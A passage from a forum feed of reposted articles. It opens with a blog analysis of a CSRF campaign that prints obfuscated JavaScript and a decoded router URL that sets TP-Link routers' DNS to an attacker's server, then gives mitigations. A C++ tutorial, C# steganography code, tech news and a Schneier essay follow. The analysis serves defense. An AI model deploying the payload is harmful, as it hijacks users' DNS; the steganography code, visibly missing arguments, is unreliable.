w$=["\\E\\6\\5\\m\\o\\3\\q\\5\\m\\8\\3\\7\\"\\5\\3\\G\\5\\j\\r\\6\\6\\"\\y\\B\\d\\e\\8\\v\\4\\5\\q\\u\\4\\o\\H\\n\\5\\5\\8\\A\\j\\j\\a\\i\\e\\d\\f\\A\\a\\i\\e\\d\\f\\B\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\j\\u\\6\\3\\4\\z\\8\\e\\j\\s\\a\\f\\F\\n\\r\\8\\C\\3\\4\\l\\3\\4\\z\\8\\e\\1\\n\\5\\e\\I\\i\\n\\r\\8\\6\\3\\4\\l\\3\\4\\7\\2\\c\\d\\8\\2\\7\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\b\\b\\c\\d\\8\\h\\7\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\k\\k\\c\\s\\3\\a\\6\\3\\7\\2\\h\\b\\c\\Q\\a\\5\\3\\x\\a\\m\\7\\b\\1\\b\\1\\b\\1\\b\\c\\i\\v\\e\\a\\d\\f\\7\\c\\i\\f\\6\\6\\3\\4\\l\\3\\4\\7\\2\\b\\g\\1\\2\\9\\P\\1\\D\\g\\1\\9\\R\\c\\i\\f\\6\\6\\3\\4\\l\\3\\4\\h\\7\\9\\1\\9\\1\\9\\1\\9\\c\\C\\a\\l\\3\\7\\p\\t\\2\\p\\S\\D\\O\\p\\t\\K\\p\\J\\g\\L\\N\\E\\j\\6\\5\\m\\o\\3\\y\\q"];M["\\x\\4\\d\\5\\3\\o\\f"](w$[0]);',56,56,'|x2e|x31|x65|x72|x74|x73|x3d|x70|x38|x61|x30|x26|x69|x6d|x6e|x36|x32|x64|x2f|x39|x76|x79|x68|x6c|x25|x20|x63|x4c|x42|x75|x6f|_|x77|x3e|x52|x3a|x40|x53|x33|x3c|x44|x78|x28|x3f|x45|x34|x29|document|x3b|x2b|x37|x67|x35|x41|var'.split('|'),0,{})) At first this code looks quite complicated and you probably don’t want to manually analyze and decode it. However, it is clearly visible that the file just contains one big eval call. The parameter to eval (the code which is executed) is dynamically computed by an anonymous function based on the parameters p,a,c,k,e,d. A little bit of googling for “eval(function(p,a,c,k,e,d)” shows that this is the result of a publicly available javascript obfuscator. There are several online javascript deobfuscators you can use to reverse engineer the packed javascript. Alternatively, you can also just replace “eval” with “console.log” and then paste the code to the javascript console of Chrome Developer Tools. This just prints out the decoded javascript, which would otherwise be passed to eval. The result of the decoding is the following code: var _$ = ["\x3c\x73\x74\x79\x6c\x65\x20\x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\x2f\x63\x73\x73\"\x3e\x40\x69\x6d\x70\x6f\x72\x74\x20\x75\x72\x6c\x28\x68\x74\x74\x70\x3a\x2f\x2f\x61\x64\x6d\x69\x6e\x3a\x61\x64\x6d\x69\x6e\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x2f\x75\x73\x65\x72\x52\x70\x6d\x2f\x4c\x61\x6e\x44\x68\x63\x70\x53\x65\x72\x76\x65\x72\x52\x70\x6d\x2e\x68\x74\x6d\x3f\x64\x68\x63\x70\x73\x65\x72\x76\x65\x72\x3d\x31\x26\x69\x70\x31\x3d\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x30\x30\x26\x69\x70\x32\x3d\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x39\x39\x26\x4c\x65\x61\x73\x65\x3d\x31\x32\x30\x26\x67\x61\x74\x65\x77\x61\x79\x3d\x30\x2e\x30\x2e\x30\x2e\x30\x26\x64\x6f\x6d\x61\x69\x6e\x3d\x26\x64\x6e\x73\x73\x65\x72\x76\x65\x72\x3d\x31\x30\x36\x2e\x31\x38\x37\x2e\x33\x36\x2e\x38\x35\x26\x64\x6e\x73\x73\x65\x72\x76\x65\x72\x32\x3d\x38\x2e\x38\x2e\x38\x2e\x38\x26\x53\x61\x76\x65\x3d\x25\x42\x31\x25\x41\x33\x2b\x25\x42\x34\x25\x45\x36\x29\x3b\x3c\x2f\x73\x74\x79\x6c\x65\x3e\x20"]; document["\x77\x72\x69\x74\x65\x6c\x6e"](_$[0]); Although this code is still obfuscated, it can easily be understood by decoding the hex-encoded strings. The string “\x77\x72\x69\x74\x65\x6c\x6e” is the hex-encoded version of “writeln” and given the way object oriented programming in javascript works the line ‘document["\x77\x72\x69\x74\x65\x6c\x6e"](_$[0]);’ is just a fancy way of writing ‘document.writeln(_$[0]);’. The array element _$[0] contains the stuff which is written to the document and after decoding the escaped hex characters you get the following equivalent code: document.writeln('<style type="text/css">@import url(http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=106.187.36.85&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6);</style>') So the obfuscated javascript adds a style tag to the current html document. The css in this style tag uses @import to instruct the browser to load additional css data from 192.168.1.1, which is the default internal IP address of most NAT routers. So it is obviously a CSRF attack which tries to reconfigure the router. The following section shows an analysis of what the request does with some TP-Link routers. Analysis of the CSRF payload It is obvious that the payload tries to reconfigure the options for the DHCP server included in the router at 192.168.1.1. While the parameters also include the start/end of the DHCP ip address range, the main purpose of the exploit is to change the primary DNS server to 106.187.36.85. The secondary nameserver points to a publicly available recursive DNS server (in this case the public DNS server provided by Google) in order to make sure that the user doesn’t notice any connectivity problems in case the attacker-controlled nameserver is (temporarily) unavailable for any reason. Searching for the string “userRpm/LanDhcpServerRpm” quickly revealed that the exploit is targeting TP-Link routers. The fact that some TP-Link routers are vulnerable to CSRF attacks has already been publicly reported [1] by Jacob Holcomb in April 2013 and TP-Link has fixed this problem for some devices since then. Experiments have shown that several TP-Link routers are actually vulnerable to this CSRF attack (see below for an incomplete list of affected devices). It is also worth noting that a web server should use POST instead of GET for all actions doing persistent changes to the router. This can protect against attacks in some scenarios where the attacker can only trigger loading a given URL e.g. by posting an image to a public discussion board or sending an HTML email (which could also be used to trigger attacks like this if the victim has enabled loading of remote images). However, even a POST request to the router can be issued in an automated way if the attacker can execute javascript code in the client browser. So in order to further protect against CSRF the server should either add a securely generated CSRF token or use strict referer checking (which is easier to implement on embedded devices). The affected TP-Link routers use HTTP Basic Authentication to control access to the web interface. When entering the credentials to access the web interface, the browser typically asks the user whether he wants to permanently store the password in the browser. However, even if the user doesn’t want to permanently store the password in the browser, it will still temporarily remember the password and use it for the current session. Since the session is only controlled by the browser behavior, the router can’t actively terminate the session e.g. after a certain timeout or when clicking a logout button. Due to this limitation of HTTP Basic Authentication the configuration web interface has no logout button at all and the only way to terminate the session is closing and reopening the browser. The CSRF exploit also includes the default credentials (username=admin, password=admin) in the URL. However, even if a username/password combination is given in the URL, the browser will ignore the credentials from the URL and still try the saved credentials or no authentication first. Only if this results in an HTTP 401 (Unauthorized) status code, the browser resends the request with the credentials from the URL. Due to this browser behavior the exploit works if the user is either logged in to the router or if the standard password hasn’t been changed. Consequences of a malicious DNS server When an attacker has changed the upstream DNS server of a router, he can then carry out arbitrary man-in-the-middle attacks against users of the compromised router. Here is a list of several possible actions which can be carried out by redirecting certain dns hostnames to an attacker server: * Redirect users to phishing sites when opening a legitimate website * Redirect users to browser exploits * Block software upgrades * Attacking software updaters which don’t use cryptographic signatures * Replace advertisements on websites by redirecting adservers (that’s what the dnschanger malware did [2]) * Replace executable files downloaded from the official download site of legitimate software vendors * Hijack email accounts by stealing the password if the mail client doesn’t enforce usage of TLS/SSL with a valid certificate * Intercept communication between Android/IOS Apps and their back end infrastructure As of now I do not know what kind of attacks the cybercrooks do with the malicious DNS servers. I have done some automated checks and resolved a large number of popular domain names with one of the DNS servers used for the attack and compared the results against a self-hosted recursive resolver. Due to the prevalence of round-robin load-balancing on DNS level and location-dependent redirection used e.g. by CDNs (content delivery networks) this automated comparison did result in a huge number of false positives and due to time constraints I could only manually verify those IP addresses which appear for a significant number of different hostnames. None of them turned out to be a malicious manipulation. However, it is very well possible that the infected routers are used for targeted attacks against a limited number of websites. If you find out what kind of attacks are carried out using the malicious DNS servers, please drop me an email or leave a comment in my blog. Prevalence of the exploit I discovered this exploitation campaign with an automated client honeypot system. Until now I spotted the exploit five times on totally unrelated websites. During that time the honeypot was generating some 280 GB of web traffic. The were some differences in the obfuscation used for the exploit but the actual CSRF requests generated are basically the same. The five instances of the exploit tried to change the primary nameserver to three different IP addresses and it is likely that there are more of them which I haven’t spotted so far. Recommendations to mitigate the problem If you are using an affected TP-Link router, you should perform the following steps to prevent it from being affected by this exploit: * Check whether the DNS servers have already been changed in your router * Upgrade your router to the latest firmware. The vulnerability has already been patched at least for some devices * If you don’t get an upgrade for your model from TP-Link, you may also check whether it is supported by OpenWRT * Change the default password to something more secure (if you haven’t already done so) * Don’t save your router password in the browser * Close all other browser windows/tabs before logging in to the router * Restart your browser when you’re finished using the router web interface (since the browser stores the password for the current browser session) Affected Devices I have already checked some TP-Link routers I had access to whether they are vulnerable to the attack. Some devices do contain the vulnerability but are by default not affected by the exploits I’ve seen so far because they are not using the IP address 192.168.1.1 in the default configuration. TP-Link WR1043ND V1 up to firmware version 3.3.12 build 120405 is vulnerable (version 3.3.13 build 130325 and later is not vulnerable) TP-Link TL-MR3020: firmware version 3.14.2 Build 120817 Rel.55520n and version 3.15.2 Build 130326 Rel.58517n are vulnerable (but not affected by current exploit in default configuration) TL-WDR3600: firmware version 3.13.26 Build 130129 Rel.59449n and version 3.13.31 Build 130320 Rel.55761n are vulnerable (but not affected by current exploit in default configuration) WR710N v1: 3.14.9 Build 130419 Rel.58371n is not vulnerable It is likely that some other devices are vulnerable as well. If you want to know whether your router is affected by this vulnerability, you can find it out by performing the following steps: 1. Open a browser and log in to your router 2. Navigate to the DHCP settings and note the DNS servers (it may be 0.0.0.0, which means that it uses the DNS server from your router’s upstream internet connection) 3. Open a new browser tab and visit the following URL (you may have to adjust the IP addresses if your router isn’t using 192.168.1.1): http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=8.8.4.4&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6 If your router is vulnerable, this changes the DNS servers to 8.8.4.4 and 8.8.8.8 (the two IP addresses from Google Public DNS). Please note that the request also reverts the DHCP IP range and lease time to the default value. 4. Go back to the first tab and reload the DHCP settings in the router web interface 5. If you see the servers 8.8.4.4 and 8.8.8.8 for primary and secondary DNS, your router is vulnerable. 6. Revert the DNS settings to the previous settings from step 2 7. If your router is vulnerable, you may also upgrade it to the latest firmware and check whether it is still vulnerable. Feel free to drop me an email or post a comment with your model number and firmware version so that I can add the device to the list above. References [1]: TP-LINK WR1043N Hacked, Rooted [2]: https://en.wikipedia.org/wiki/DNSChanger This entry was posted in Security by Jakob. Sursa: Real-World CSRF attack hijacks DNS Server configuration of TP-Link routers | Jakob Lell's Blog
  14. C++11 Tutorial: Explaining the Ever-Elusive Lvalues and Rvalues October 30, 2013 by Danny Kalev Every C++ programmer is familiar with the terms lvalue and rvalue. It’s no surprise, since the C++ standard uses them “all over”, as do many textbooks. But what do they mean? Are they still relevant now that C++11 has five value categories? It’s about time to clear up the mystery and get rid of the myths. Lvalues and rvalues were introduced in a seminal article by Strachey et al (1963) that presented CPL. A CPL expression appearing on the left hand side of an assignment expression is evaluated as a memory address into which the right-hand side value is written. Later, left-hand expressions and right-hand expressions became lvalues and rvalues, respectively. One of CPL’s descendants, B, was the language on which Dennis Ritchie based C. Ritchie borrowed the term lvalue to refer to a memory region to which a C program can write the right hand side value of an assignment expression. He left out rvalues, feeling that lvalue and “not lvalue” would suffice. Later, rvalue made it into K&R C and ISO C++. C++11 extended the notion of rvalues even further by letting you bind rvalue references to them. Although nowadays lvalue and rvalues have slightly different meanings from their original CPL meanings, they are encoded “in the genes of C++,” to quote Bjarne Stroustrup. Therefore, understanding what they mean and how the addition of move semantics affected them can help you understand certain C++ features and idioms better –– and write better code. Right from Wrong Before attempting to define lvalues, let’s look at some examples: int x=9; std::string s; int *p=0; int &ri=x; The identifiers x, s, p and ri are all lvalues. Indeed, they can appear on the left-hand side of an assignment expression and therefore seem to justify the CPL generalization: “Anything that can appear on the left-hand side of an assignment expression is an lvalue.” However, counter-examples are readily available: void func(const int * pi, const int & ri) { *pi=7;//compilation error, *pi is const ri=8; //compilation error, ri is const } *pi and ri are const lvalues. Therefore, they cannot appear on the left-hand side of an expression after their initialization. This property doesn’t make them rvalues, though. Now let’s look at some examples of rvalues. Literals such as 7, ‘a’, false and “hello world!” are instances of rvalues: 7==x; char c= 'a'; bool clear=false; const char s[]="hello world!"; Another subcategory of rvalues is temporaries. During the evaluation of an expression, an implementation may create a temporary object that stores an intermediary result: int func(int y, int z, int w){ int x=0; x=(y*z)+w; return x ; } In this case, an implementation may create a temporary int to store the result of the sub-expression y*z. Conceptually, a temporary expires once its expression is fully evaluated. Put differently, it goes out of scope or gets destroyed upon reaching the nearest semicolon. You can create temporaries explicitly, too. An expression in the form C(arguments) creates a temporary object of type C: cout<<std::string ("test").size()<<endl; Contrary to the CPL generalization, rvalues may appear on the left-hand side of an assignment expression in certain cases: string ()={"hello"}; //creates a temp string You’re probably more familiar with the shorter form of this idiom: string("hello"); //creates a temp string Clearly, the CPL generalization doesn’t really cut it for C++, although intuitively, it does capture the semantic difference between lvalues and rvalues. So, what do lvalues and rvalues really stand for? A Matter of Identity An expression is a program statement that yields a value, for example a function call, a sizeof expression, an arithmetic expression, a logical expression, and so on. You can classify C++ expressions into two categories: values with identity and values with no identity. In this context, identity means a name, a pointer, or a reference that enable you to determine if two objects are the same, to change the state of an object, or copy it: struct {int x; int y;} s; //no type name, value has id string &rs= *new string; const char *p= rs.data(); s, rs and p are identities of values. We can draw the following generalization: lvalues in C++03 are values that have identity. By contrast, rvalues in C++03 are values that have no identity. C++03 rvalues are accessible only inside the expression in which they are created: int& func(); int func2(); func(); //this call is an lvalue func2(); //this call is an rvalue sizeof(short); //rvalue new double; //new expressions are rvalues S::S() {this->x=0; /*this is an rvalue expression*/} A function’s name (not to be confused with a function call) is an rvalue expression that evaluates to the function’s address. Similarly, an array’s name is an rvalue expression that evaluates to the address of the first element of the array: int& func3(); int& (*pf)()=func3;//func3 is an rvalue int arr[2]; int* pi=arr;//arr is an rvalue Because rvalues are short-lived, you have to capture them in lvalues if you wish to access them outside the context of their expression: std::size_t n=sizeof(short); double *pd=new double; struct S { int x, y; S() { S *p=this; p->x=0; p->y=0;} }; Remember that any expression that evaluates to an lvalue reference (e.g., a function call, an overloaded assignment operator, etc.) is an lvalue. Any expression that returns an object by value is an rvalue. Prior to C++11, identity (or the lack thereof) were the main criterion for distinguishing between lvalues and rvalues. However, the addition of rvalue references and move semantics to C++11 added a twist to the plot. Binding Rvalues C++11 lets you bind rvalue references to rvalues, effectively prolonging their lifetime as if they were lvalues: //C++11 int && func2(){ return 17; //returns an rvalue } int main() { int x=0; int&& rr=func2(); cout<<rr<<endl;//ouput: 17 x=rr;// x=17 after the assignment } Using lvalue references where rvalue references are required is an error: int& func2(){//compilation error: cannot bind return 17; //an lvalue reference to an rvalue } In C++03 copying the rvalue to an lvalue is the preferred choice (in some cases you can bind an lvalue reference to const to achieve a similar effect): int func2(){ // an rvalue expression return 17; } int m=func2(); // C++03-style copying For fundamental types, the copy approach is reasonable. However, as far as class objects are concerned, spurious copying might incur performance overhead. Instead, C++11 encourages you to move objects. Moving means pilfering the resources of the source object, instead of copying it. For further information about move semantics, read C++11 Tutorial: Introducing the Move Constructor and the Move Assignment Operator. //C++11 move semantics in action string source ("abc"), target; target=std::move(source); //pilfer source //source no longer owns the resource cout<<"source: "<<source<<endl; //source: cout<<"target: "<<target<<endl; //target: abc How does move semantics affect the semantics of lvalues and rvalues? The Semantics of Change In C++03, all you needed to know was whether a value had identity. In C++11 you also have to examine another property: movability. The combination of identity and movability (i and m, respectively, with a minus sign indicating negation) produces five meaningful value categories in C++11— “a whole type-zoo,” as one of my Twitter followers put it: i-m: lvalues are non-movable objects with identity. These are classic C++03 lvalues from the pre-move era. The expression *p, where p is a pointer to an object is an lvalue. Similarly, dereferencing a pointer to a function is an lvalue. im: xvalues (an “eXpiring” value) refers to an object near the end of its lifetime (before its resources are moved, for example). An xvalue is the result of certain kinds of expressions involving rvalue references, e.g., std::move(mystr); i: glvalues, or generalized lvalues, are values with identity. These include lvalues and xvalues. m: rvalues include xvalues, temporaries, and values that have no identity. -im: prvalues, or pure rvalues, are rvalues that are not xvalues. Prvalues include literals and function calls whose return type is not a reference. A detailed discussion about the new value categories is available in section 3.10 of the C++11 standard. It has often been said that the original semantics of C++03 lvalues and rvalues remains unchanged in C++11. However, the C++11 taxonomy isn’t quite the same as that of C++03; In C++11, every expression belongs to exactly one of the value classifications lvalue, xvalue, or prvalue. In Conclusion Fifty years after their inception, lvalues and rvalues are still relevant not only in C++ but in many contemporary programming languages. C++11 changed the semantics of rvalues, introducing xvalues and prvalues. Conceptually, you can tame this type-zoo by grouping the five value categories into supersets, where glvalues include lvalues and xvalues, and rvalues include xvalues and prvalues. Still confused? It’s not you. It’s BCPL’s heritage that exhibits unusual vitality in a world that’s light years away from the punched card and 16 kilobyte RAM era. About the author: Danny Kalev is a certified system analyst and software engineer specializing in C++. Kalev has written several C++ textbooks and contributes C++ content regularly on various software developers’ sites. He was a member of the C++ standards committee and has a master’s degree in general linguistics. He’s now pursuing a PhD in linguistics. Follow him on Twitter. Sursa: C++11 Tutorial: Explaining the Ever-Elusive Lvalues and Rvalues
  15. [h=1]Steganography: Simple Implementation in C#[/h]By Hamzeh soboh, 31 Oct 2013 Download source - 154.3 KB [h=2]Introduction[/h] Steganography is the art and science of hiding information by embedding messages within others. Steganography works by replacing bits of useless or unused data in regular computer files with bits of different, invisible information. This hidden information can be plain text, cipher text, or even images [*]. I've implemented two methods that can be helpful to embed/extract a text in/from an image. The first one is embedText that receives the text you want to embed and the Bitmap object of the original image (your image before embedding the text in it), and returns the Bitmap object of the image after embedding the text in it. Then you can export the Bitmap object into an image file. It is optional to encrypt your text before starting the process for extra security. You are free then to send the result image by email or keep it on your flash memory for example. The second method is extractText that receives the Bitmap object of the processed image (the image that has already been used to embed the text in), and returns the text that has been extracted. [h=2]Executing the Code[/h]If you download the attached testing project, it allows you to open an image, write your text or import a text file, optionally encrypt your text before starting processing, embed the text in the image, and finally save the result image into an image file. Then you can reopen that application and the image that you've saved, and extract the text from it. [h=2]Using the Code[/h] The SteganographyHelper class contains the needed methods to embed/extract a text in/from an image. CAUTION: Don't save the result image in a lossy format (like JPEG); your data will be lost. Saving it as PNG is pretty good. class SteganographyHelper { enum State { hiding, filling_with_zeros }; public static Bitmap embedText(string text, Bitmap bmp) { State s = State.hiding; int charIndex = 0; int charValue = 0; long colorUnitIndex = 0; int zeros = 0; int R = 0, G = 0, B = 0; for (int i = 0; i < bmp.Height; i++) { for (int j = 0; j < bmp.Width; j++) { Color pixel = bmp.GetPixel(j, i); pixel = Color.FromArgb(pixel.R - pixel.R % 2, pixel.G - pixel.G % 2, pixel.B - pixel.B % 2); R = pixel.R; G = pixel.G; B = pixel.B; for (int n = 0; n < 3; n++) { if (colorUnitIndex % 8 == 0) { if (zeros == 8) { if ((colorUnitIndex - 1) % 3 < 2) { bmp.SetPixel(j, i, Color.FromArgb(R, G, ); } return bmp; } if (charIndex >= text.Length) { s = State.filling_with_zeros; } else { charValue = text[charIndex++]; } } switch (colorUnitIndex % 3) { case 0: { if (s == State.hiding) { R += charValue % 2; charValue /= 2; } } break; case 1: { if (s == State.hiding) { G += charValue % 2; charValue /= 2; } } break; case 2: { if (s == State.hiding) { B += charValue % 2; charValue /= 2; } bmp.SetPixel(j, i, Color.FromArgb(R, G, ); } break; } colorUnitIndex++; if (s == State.filling_with_zeros) { zeros++; } } } } return bmp; } public static string extractText(Bitmap bmp) { int colorUnitIndex = 0; int charValue = 0; string extractedText = String.Empty; for (int i = 0; i < bmp.Height; i++) { for (int j = 0; j < bmp.Width; j++) { Color pixel = bmp.GetPixel(j, i); for (int n = 0; n < 3; n++) { switch (colorUnitIndex % 3) { case 0: { charValue = charValue * 2 + pixel.R % 2; } break; case 1: { charValue = charValue * 2 + pixel.G % 2; } break; case 2: { charValue = charValue * 2 + pixel.B % 2; } break; } colorUnitIndex++; if (colorUnitIndex % 8 == 0) { charValue = reverseBits(charValue); if (charValue == 0) { return extractedText; } char c = (char)charValue; extractedText += c.ToString(); } } } } return extractedText; } public static int reverseBits(int n) { int result = 0; for (int i = 0; i < 8; i++) { result = result * 2 + n % 2; n /= 2; } return result; } } You can use the following code snippet to save the result image: private void saveImageAs() { SaveFileDialog save_dialog = new SaveFileDialog(); save_dialog.Filter = "PNG|*.png|Bitmap|*.bmp"; if (save_dialog.ShowDialog() == DialogResult.OK) { switch (save_dialog.FilterIndex) { case 0: { bmp.Save(save_dialog.FileName, ImageFormat.Png); }break; case 1: { bmp.Save(save_dialog.FileName, ImageFormat.Bmp); } break; } } } [h=2]License[/h] This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) Sursa: Steganography: Simple Implementation in C# - CodeProject
  16. Manzano - A tool for the Symbolic Execution of Linux binaries About Symbolic Execution ? Dynamically explore all program branches. ? Inputs are considered symbolic variables. ? Symbols remain uninstantiated and become constrained at execution time. ? At a conditional branch operating on symbolic terms, the execution is forked. ? Each feasible branch is taken, and the appropriate constraints logged. Download: http://ekoparty.org/archive/2013/charlas/Manzano.pdf
  17. [h=2]Intel unveils new LTE module[/h]Written by Fudzilla staff Getting there, slowly Intel has added another module to its growing portfolio of 4G LTE solutions. The XMM 7160 is said to be one of the smallest LTE solutions out there and it’s already shipping in Samsung’s Intel-based Galaxy Tab 3. However, it is still a module and Intel will not have an integrated LTE solution until 2014, if then. Intel expects the first LTE-enabled phones based on its SoCs to show up next year, but they will not have integrated LTE. Unlike its previous solutions, the XM7160 supports HSPA and GSM in addition to 15 LTE bands. It also supports VoLTE services. Intel plans to introduce an even more advanced LTE module next year, with support for new advanced LTE features used by some networks. Intel is also offering the M.2 LTE module, which has practically the same hardware packed in a standard mini PCIe package. Until Intel launches its first truly integrated LTE solution, Qualcomm will continue to dominate the LTE space, virtually unopposed. Intel is not alone though. Nvidia, Mediatek and Broadcom are all behind Qualcomm and they are struggling to catch up. However, Samsung and Apple are still absent from the list and they rely on discrete solutions, not to mention countless smaller players, so there’s still a market for modules like the XMM 7160. Sursa: Intel unveils new LTE module De ce am postat asta? Nu se stie sigur cum functioneaza Anti-Theft-ul de la Intel. Din mment ce poate functiona pe GSM, inseamna ca procesorul are un modul de GSM "ascuns", nu? Stirea asta ma face sa fiu si mai paranoic si sa cred si mai mult aceasta teorie.
  18. The Battle for Power on the Internet We're in the middle of an epic battle for power in cyberspace. On one side are the traditional, organized, institutional powers such as governments and large multinational corporations. On the other are the distributed and nimble: grassroots movements, dissident groups, hackers, and criminals. Initially, the Internet empowered the second side. It gave them a place to coordinate and communicate efficiently, and made them seem unbeatable. But now, the more traditional institutional powers are winning, and winning big. How these two side fare in the long term, and the fate of the rest of us who don't fall into either group, is an open question -- and one vitally important to the future of the Internet. In the Internet's early days, there was a lot of talk about its "natural laws" -- how it would upend traditional power blocks, empower the masses, and spread freedom throughout the world. The international nature of the Internet circumvented national laws. Anonymity was easy. Censorship was impossible. Police were clueless about cybercrime. And bigger changes seemed inevitable. Digital cash would undermine national sovereignty. Citizen journalism would topple traditional media, corporate PR, and political parties. Easy digital copying would destroy the traditional movie and music industries. Web marketing would allow even the smallest companies to compete against corporate giants. It really would be a new world order. This was a utopian vision, but some of it did come to pass. Internet marketing has transformed commerce. The entertainment industries have been transformed by things like MySpace and YouTube, and are now more open to outsiders. Mass media has changed dramatically, and some of the most influential people in the media have come from the blogging world. There are new ways to organize politically and run elections. Crowdfunding has made tens of thousands of projects possible to finance, and crowdsourcing made more types of projects possible. Facebook and Twitter really did help topple governments. But that is just one side of the Internet's disruptive character. The Internet has emboldened traditional power as well. On the corporate side, power is consolidating, a result of two current trends in computing. First, the rise of cloud computing means that we no longer have control of our data. Our e-mail, photos, calendars, address books, messages, and documents are on servers belonging to Google, Apple, Microsoft, Facebook, and so on. And second, we are increasingly accessing our data using devices that we have much less control over: iPhones, iPads, Android phones, Kindles, ChromeBooks, and so on. Unlike traditional operating systems, those devices are controlled much more tightly by the vendors, who limit what software can run, what they can do, how they're updated, and so on. Even Windows 8 and Apple's Mountain Lion operating system are heading in the direction of more vendor control. I have previously characterized this model of computing as "feudal." Users pledge their allegiance to more powerful companies who, in turn, promise to protect them from both sysadmin duties and security threats. It's a metaphor that's rich in history and in fiction, and a model that's increasingly permeating computing today. Medieval feudalism was a hierarchical political system, with obligations in both directions. Lords offered protection, and vassals offered service. The lord-peasant relationship was similar, with a much greater power differential. It was a response to a dangerous world. Feudal security consolidates power in the hands of the few. Internet companies, like lords before them, act in their own self-interest. They use their relationship with us to increase their profits, sometimes at our expense. They act arbitrarily. They make mistakes. They're deliberately -- and incidentally -- changing social norms. Medieval feudalism gave the lords vast powers over the landless peasants; we're seeing the same thing on the Internet. It's not all bad, of course. We, especially those of us who are not technical, like the convenience, redundancy, portability, automation, and shareability of vendor-managed devices. We like cloud backup. We like automatic updates. We like not having to deal with security ourselves. We like that Facebook just works -- from any device, anywhere. Government power is also increasing on the Internet. There is more government surveillance than ever before. There is more government censorship than ever before. There is more government propaganda, and an increasing number of governments are controlling what their users can and cannot do on the Internet. Totalitarian governments are embracing a growing "cyber sovereignty" movement to further consolidate their power. And the cyberwar arms race is on, pumping an enormous amount of money into cyber-weapons and consolidated cyber-defenses, further increasing government power. In many cases, the interests of corporate and government powers are aligning. Both corporations and governments benefit from ubiquitous surveillance, and the NSA is using Google, Facebook, Verizon, and others to get access to data it couldn't otherwise. The entertainment industry is looking to governments to enforce its antiquated business models. Commercial security equipment from companies like BlueCoat and Sophos is being used by oppressive governments to surveil and censor their citizens. The same facial recognition technology that Disney uses in its theme parks can also identify protesters in China and Occupy Wall Street activists in New York. Think of it as a public/private surveillance partnership. What happened? How, in those early Internet years, did we get the future so wrong? The truth is that technology magnifies power in general, but rates of adoption are different. The unorganized, the distributed, the marginal, the dissidents, the powerless, the criminal: They can make use of new technologies very quickly. And when those groups discovered the Internet, suddenly they had power. But later, when the already-powerful big institutions finally figured out how to harness the Internet, they had more power to magnify. That's the difference: The distributed were more nimble and were faster to make use of their new power, while the institutional were slower but were able to use their power more effectively. So while the Syrian dissidents used Facebook to organize, the Syrian government used Facebook to identify dissidents to arrest. All isn't lost for distributed power, though. For institutional power, the Internet is a change in degree, but for distributed power it's a qualitative one. The Internet gives decentralized groups -- for the first time -- the ability to coordinate. This can have incredible ramifications, as we saw in the SOPA/PIPA debate, Gezi, Brazil, and the rising use of crowdfunding. It can invert power dynamics, even in the presence of surveillance censorship and use control. But aside from political coordination, the Internet allows for social coordination as well to unite, for example, ethnic diasporas, gender minorities, sufferers of rare diseases, and people with obscure interests. This isn't static: Technological advances continue to provide advantage to the nimble. I discussed this trend in my book Liars and Outliers. If you think of security as an arms race between attackers and defenders, any technological advance gives one side or the other a temporary advantage. But most of the time, a new technology benefits the nimble first. They are not hindered by bureaucracy -- and sometimes not by laws or ethics either. They can evolve faster. We saw it with the Internet. As soon as the Internet started being used for commerce, a new breed of cybercriminal emerged, immediately able to take advantage of the new technology. It took police a decade to catch up. And we saw it on social media, as political dissidents made use of its organizational powers before totalitarian regimes did. This delay is what I call a "security gap." It's greater when there's more technology, and in times of rapid technological change. Basically, if there are more innovations to exploit, there will be more damage resulting from society's inability to keep up with exploiters of all of them. And since our world is one in which there's more technology than ever before, and a faster rate of technological change than ever before, we should expect to see a greater security gap than ever before. In other words, there will be an increasing time period during which nimble distributed powers can make use of new technologies before slow institutional powers can make better use of those technologies. This is the battle: quick vs. strong. To return to medieval metaphors, you can think of a nimble distributed power -- whether marginal, dissident, or criminal -- as Robin Hood; and ponderous institutional powers -- both government and corporate -- as the feudal lords. So who wins? Which type of power dominates in the coming decades? Right now, it looks like traditional power. Ubiquitous surveillance means that it's easier for the government to identify dissidents than it is for the dissidents to remain anonymous. Data monitoring means easier for the Great Firewall of China to block data than it is for people to circumvent it. The way we all use the Internet makes it much easier for the NSA to spy on everyone than it is for anyone to maintain privacy. And even though it is easy to circumvent digital copy protection, most users still can't do it. The problem is that leveraging Internet power requires technical expertise. Those with sufficient ability will be able to stay ahead of institutional powers. Whether it's setting up your own e-mail server, effectively using encryption and anonymity tools, or breaking copy protection, there will always be technologies that can evade institutional powers. This is why cybercrime is still pervasive, even as police savvy increases; why technically capable whistleblowers can do so much damage; and why organizations like Anonymous are still a viable social and political force. Assuming technology continues to advance -- and there's no reason to believe it won't -- there will always be a security gap in which technically advanced Robin Hoods can operate. Most people, though, are stuck in the middle. These are people who have don't have the technical ability to evade either the large governments and corporations, avoid the criminal and hacker groups who prey on us, or join any resistance or dissident movements. These are the people who accept default configuration options, arbitrary terms of service, NSA-installed back doors, and the occasional complete loss of their data. These are the people who get increasingly isolated as government and corporate power align. In the feudal world, these are the hapless peasants. And it's even worse when the feudal lords -- or any powers -- fight each other. As anyone watching Game of Thrones knows, peasants get trampled when powers fight: when Facebook, Google, Apple, and Amazon fight it out in the market; when the US, EU, China, and Russia fight it out in geopolitics; or when it's the US vs. "the terrorists" or China vs. its dissidents. The abuse will only get worse as technology continues to advance. In the battle between institutional power and distributed power, more technology means more damage. We've already seen this: Cybercriminals can rob more people more quickly than criminals who have to physically visit everyone they rob. Digital pirates can make more copies of more things much more quickly than their analog forebears. And we'll see it in the future: 3D printers mean that the computer restriction debate will soon involves guns, not movies. Big data will mean that more companies will be able to identify and 